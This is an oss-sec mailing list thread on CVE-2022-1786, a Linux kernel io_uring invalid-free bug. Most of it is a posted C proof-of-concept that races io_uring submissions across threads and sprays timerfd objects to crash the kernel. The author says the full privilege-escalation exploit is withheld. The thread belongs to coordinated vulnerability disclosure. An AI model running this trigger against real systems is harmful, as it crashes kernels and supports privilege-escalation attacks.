oss-sec mailing list archives
Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring
From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700
Hi all, A minimal crashing PoC for CVE-2022-1786 is attached in the email. Kyle =-=-=-=-=-=-=-= #define _GNU_SOURCE #include <stdarg.h> #include <dirent.h> #include <endian.h> #include <errno.h> #include <pthread.h> #include <sched.h> #include <setjmp.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/mount.h> #include <sys/prctl.h> #include <sys/resource.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/time.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #include <assert.h> #include <fcntl.h> #include <linux/fs.h> #include <sys/msg.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/timerfd.h> #include <sys/xattr.h> #include <linux/capability.h> #include <linux/futex.h> #include <linux/io_uring.h> // io_uring tutorial: #define u64 unsigned long long #define u32 unsigned int # ifndef __NR_io_uring_setup # define __NR_io_uring_setup 425 # endif # ifndef __NR_io_uring_enter # define __NR_io_uring_enter 426 # endif # ifndef __NR_io_uring_register # define __NR_io_uring_register 427 # endif int fd_io_uring; #define GROOM_NUM 0x20 u64 cpu_num = 4; u64 work_num = 0x200; char fname[] = "/etc/passwd"; u64 heap_addr; int target_shmid; char timerfd_backup[0x100]; #define NAP_TIME1 50000 #define NAP_TIME2 50000 void set_cpu(int cpuid) { cpu_set_t my_set; CPU_ZERO(&my_set); CPU_SET(cpuid, &my_set); assert(sched_setaffinity(0, sizeof(my_set), &my_set) == 0); } void increase_limit() { int ret; struct rlimit open_file_limit; /* Query current soft/hard value */ ret = getrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); printf("[*] file limit: %d\n", open_file_limit.rlim_max); /* Set soft limit to hard limit */ open_file_limit.rlim_cur = open_file_limit.rlim_max; ret = setrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); } struct cq_ring_t { u32 *head; u32 
*tail; u32 *ring_mask; u32 *ring_entries; struct io_uring_cqe *cqes; }; struct sq_ring_t { u32 *head; u32 *tail; u32 *ring_mask; u32 *ring_entries; u32 *flags; u32 *array; }; struct uring_mgr_t { int fd; struct sq_ring_t sq_ring; struct cq_ring_t cq_ring; struct io_uring_sqe *sqes; }; #define IORING_OP_WRITE 23 #define IORING_OP_READ 22 struct uring_mgr_t mgr; void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries) { // create io_uring fd struct io_uring_params setup_params = {0}; setup_params.flags = IORING_SETUP_IOPOLL; mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params); assert(mgr->fd >= 0); // map the ring buffer and the SQE(submission queue entry) buffer uint32_t sq_ring_sz = setup_params.sq_off.array + setup_params.sq_entries * sizeof(uint32_t); uint32_t cq_ring_sz = setup_params.cq_off.cqes + setup_params.cq_entries * sizeof(struct io_uring_cqe); uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz; uint32_t sqes_sz = setup_params.sq_entries * sizeof(struct io_uring_sqe); void *ring_ptr = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQ_RING); mgr->sqes = (struct io_uring_sqe *) mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQES); assert((long)mgr->sqes >= 0); // now initialize the completion queue struct cq_ring_t *cq_ring = &mgr->cq_ring; cq_ring->head = (u32 *)((long )ring_ptr + setup_params.cq_off.head); cq_ring->tail = (u32 *)((long)ring_ptr + setup_params.cq_off.tail); cq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_mask); cq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_entries); cq_ring->cqes = (struct io_uring_cqe *)((long)ring_ptr + setup_params.cq_off.cqes); // now initialize the submission queue struct sq_ring_t *sq_ring = &mgr->sq_ring; sq_ring->head = (u32 *)((long)ring_ptr + setup_params.sq_off.head); sq_ring->tail = (u32 *)((long)ring_ptr + setup_params.sq_off.tail); 
sq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_mask); sq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_entries); sq_ring->flags = (u32 *)((long)ring_ptr + setup_params.sq_off.flags); sq_ring->array = (u32 *)((long)ring_ptr + setup_params.sq_off.array); } int *flag; u64 val; u64 *val_ptr = &val; u64 elapse_time[2]; void *func(void *arg) { int cpuid = (int)(long)arg; set_cpu(cpuid); while(*flag == 0); int ret = syscall(__NR_io_uring_enter, fd_io_uring, work_num/2, work_num/2, 1); __atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST); } void trigger_free() { uring_mgr_setup(&mgr, work_num); fd_io_uring = mgr.fd; printf("fd_io_uring: %d\n", fd_io_uring); // open some file // fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC); int fds[work_num]; puts(fname); for(int i=0; i<work_num; i++) { fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC); assert(fds[i] >= 0); } printf("fd: %d\n", fds[0]); assert(fds[0] >= 0); // SQE: submission queue entries // struct io_uring_sqe sqe = { // .opcode = IORING_OP_WRITE, // .flags = 0, // .ioprio = 0, // .fd = fd, // .off = 0, // .addr = 0, // .len = 1, // }; void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0); memset(buf, 'A', 0x5000000); struct io_uring_sqe sqe = { .opcode = IORING_OP_READ, .flags = 0, .ioprio = 0, .fd = -1, .off = 0, .addr = (u64)buf, .len = 0x5000000, }; // now submit the request struct sq_ring_t *sq_ring = &mgr.sq_ring; struct cq_ring_t *cq_ring = &mgr.cq_ring; u32 index, tail, next_tail; next_tail = tail = *sq_ring->tail; next_tail++; // barrier(); // copy the request to the sqe buffer index = tail & *mgr.sq_ring.ring_mask; for(int i=0; i<work_num; i++) { sqe.fd = fds[i]; memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe)); } sq_ring->array[index] = index; tail = next_tail; assert(*sq_ring->tail != tail); *sq_ring->tail = work_num; set_cpu(2); pthread_t tids[2]; int ret; for(int i=0; i<2; i++) { ret = 
pthread_create(&tids[i], NULL, func, i); assert(ret == 0); } *flag = 1; // sleep(1); while(*val_ptr != 2); pthread_join(tids[0], NULL); pthread_join(tids[1], NULL); // sleep(1000); execve("/", NULL, NULL); close(fd_io_uring); exit(0); } void attempt() { flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0); if(!fork()) { trigger_free(); } else { wait(NULL); for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0); } } int main() { puts("========================================================================"); increase_limit(); set_cpu(0); for(int i=0; i<10000; i++) { printf("i: %d\n", i); usleep(10000); if(!fork()) attempt(); else { wait(NULL); } } puts("Done"); } =-=-=-=-=-=-=-= On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:
A small correction: I shared a minimal crashing PoC to linux-distros but not the LPE exploit. I do not plan to share the LPE exploit because of ethical issues. To answer your question: I intend to post the crashing PoC on May 27th. Thanks for reminding me. Kyle

On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:
> On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:
> > # Impact
> > I wrote a proof-of-concept exploit and demonstrated that it can be used to achieve local privilege escalation.
>
> Since you shared the PoC exploit with linux-distros, you're supposed to also post that to oss-security within 7 days of your first posting above, so by or on May 31. Do you intend to, and when exactly?
>
> Alexander
Current thread:
- CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 28)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)